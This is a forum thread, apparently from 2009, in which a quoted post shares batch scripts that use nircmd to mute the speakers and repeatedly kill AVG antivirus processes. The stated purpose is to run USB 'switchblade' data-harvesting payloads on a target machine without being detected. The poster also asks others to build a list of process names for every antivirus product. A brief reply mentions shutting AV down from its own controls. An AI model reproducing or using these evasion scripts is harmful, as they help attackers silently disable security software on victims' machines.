Alternative Method to Kill AV's. |
  |
 Fri, 06 Nov 2009 19:34:17 +0000
Post
#41
|
|
|
Newbie Group: Members Posts: 2 Joined: Fri, 06 Nov 2009 19:14:35 +0000 Member No.: 16,305  |
QUOTE (Abigwar @ Wed, 15 Oct 2008 12:18:48 +0000)  Ok guys, We all know that the AVKill (csrss.exe) we use for our switchblades is outdated and flagged by every AV known. So I wanted to come up with an alternative method of killing AV's before launching our switchblades. If this works out, I think it would be a great addition to Leapos Pocket Knife. What I decided to try, was using Nircmd's processkill command to elminate the AV processes. I was concerned that the AV would recognize the attempt and block it, or alert. For AV's such as Avast, we would want to make sure we mute the system speakers. (Note, We would want to do that anyway, because if Avast flags a virus it screams "A VIRUS HAS BEEN DETECTED"). Anyway, if a certain AV alerts to the attempt to kill it's process, what is the difference, because it is going to alert to running csrss.exe and some of our other tools. So long as it isn't audible, we still have time to get in and out with out immediete detection. I tested this on AVG and it worked flawless and silently. CODE ::Abigwar's First Attempt at Batch AVkiller ::Mute the system volume, in case of audible AV Alerts (Avast!) nircmd mutesysvolume 1 ::Kill AVG Command Center nircmd killprocess avgcc.exe ::Kill other AVG Processes nircmd killprocess avgemc.exe nircmd killprocess avgupsvc.exe nircmd killprocess avgamsvr.exe ::Restore system volume at end of switchblade nircmd mutesysvolume 0 Now what I would like to ask from all of you, is to look at your system processes and lets make a list of the processes each virus scanner uses. When we have them all listed, we can then script it into the batch to kill all the applicitable processes. We also need to see how each AV reacts to the attempt to kill it's processes. One other thing I was considering, that if an AV's process is persistant, we could loop the batch file to continue to run, and kill the process over and over. How that could work, is we would call the seperate Anti-AV batch file from the start.bat or go.bat, and let it loop until the switchblade ends. So at the end of the switch blade we would create a text file on the thumbdrive. The loop would stop when it sees the file, then delete it to make it ready for next time and end. CODE ::Theoretical Loop batch :Start nircmd killprocess avgcc.exe nircmd killprocess avgemc.exe nircmd killprocess avgupsvc.exe nircmd killprocess avgamsvr.exe IF EXIST SWITCHDONE.TXT GOTO END GOTO START :END delete switchdone.txt A pretty detailed list of AV processes can be found here: http://dev.metasploit.com/redmine/projects...reter/killav.rb |
 |
 
|
|
Fri, 06 Nov 2009 21:39:37 +0000
Post
#42
|
|
|
Hak.5 Fan ++  Group: Members Posts: 76 Joined: Tue, 30 Dec 2008 18:35:07 +0000 From: Australia Member No.: 12,383 |
I find that the easiest way to kill anti-virus software etc is to go to the programs main controls and shut it down from there.
Too easy 
--------------------         |
|
|
|
|
2 User(s) are reading this topic (2 Guests and 0 Anonymous Users)
0 Members:
|
Lo-Fi Version | Time is now: Fri, 20 Nov 2009 19:55:27 +0000 |